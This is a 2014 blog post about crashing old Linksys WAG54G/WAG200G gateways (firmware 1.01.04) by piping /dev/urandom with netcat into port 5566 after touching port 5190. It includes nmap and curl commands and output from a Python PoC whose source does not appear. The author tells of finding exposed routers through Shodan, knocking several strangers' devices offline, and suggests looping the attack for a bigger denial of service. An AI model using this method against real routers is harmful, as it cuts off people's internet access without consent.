Saturday, September 6, 2014

Killing old Linksys WAG54* or WAG200* like "Rambo" (temporary)

Two days ago i visited a friend of me. I was showing him how to discover open ports in a network with nmap. As example I chose his home gateway. His gateway is/was a WAG54G from Linksys. Without firmware uptated.  Year 2009, more or less.

He was surprised when we discovered two weird ports in the gateway: 5190 and 5566 ports. He didn't have any port configured to be open but I ignored that because  I thought they were some private ports to configure the gateway from a GUI in Windows or something similar.

We were speaking and connecting to some ports for a while.... and I figured out the behavior of 5566 port was different after connecting to the 5190 port.  It was very odd.

If you connect to the 5566 port you will receive a fast disconnection but if you make a connection to the 5190 port before, the 5566 port is waiting data in a lot of cases. Bye bye to the fast disconnection.

So, for my curiosity i tried to fuzz the port with /dev/urandom.... something similar to:
cat /dev/urandom | nc -v 5566
Meanwhile...when I was explaining to my friend about how a protocol works, our internet connection was down.

BOOM!        o_O

I said:  - Ermmm... Let me try it again buddy!      ..and...

BOOM!       O_O

I had to come back to home. In the way, I was thinking about the port issue.

At home, my first step was to see if those ports were private or public.... and BOOM! Public!

But I didn't have any router Linksys at home to try it again... so my friend Shodan came to the rescue! ;)

The next steps are very bored but, more or less, it was a huge trial and error process and, more or less , this was the PoC conclusion:

  • Very old linksys: Shodan have a lot of them.
  • Ports 5190 and 5566 open: Shodan  has few of them but it has them.
  • Nmap to confirm some data.
There we go:
$ nmap -sS -p 5190,5566 x.x.x.x

Starting Nmap 5.51 ( ) at 2014-09-06 08:33 CEST
Nmap scan report for gateway (x.x.x.x)
Host is up (0.080s latency).
5190/tcp open  aol
5566/tcp open  westec-connect

Curl check:
$ curl -I -q --max-time 5 x.x.x.x
HTTP/1.1 401 Unauthorized
Date: Sat, 06 Sep 2014 06:31:53 GMT
WWW-Authenticate: Basic realm="Linksys WAG200G "
Content-Type: text/html
Connection: close

Ok. Ingredients Ok. We can run the PoC. Sometimes you need to run it twice or more times. Honestly I don't know why.

$ python x.x.x.x
OldLinksysMustDie v0.001b PoC
 * Connecting to x.x.x.x...
 * Cooking... be patient....
 * On Fire!
[BYEBYE] Ooops! connection to the target lost. [BYEBYE]

Curl again:

curl -I -q --max-time 5 x.x.x.x
curl: (28) Operation timed out after 5001 milliseconds with 0 bytes received

And RAMBO was here! I tried others one and... all temporary dead!!

NOTE: The router is recovered 5-10 minutes after running the PoC, but, if you want a big DOS, a "loop" in the computers world is so easy..... ;)

Finally, my horrible PoC (horrible like my English) in python:

Are you ready John?

Firmware affected: 
  • 1.01.04

No comments:

Post a Comment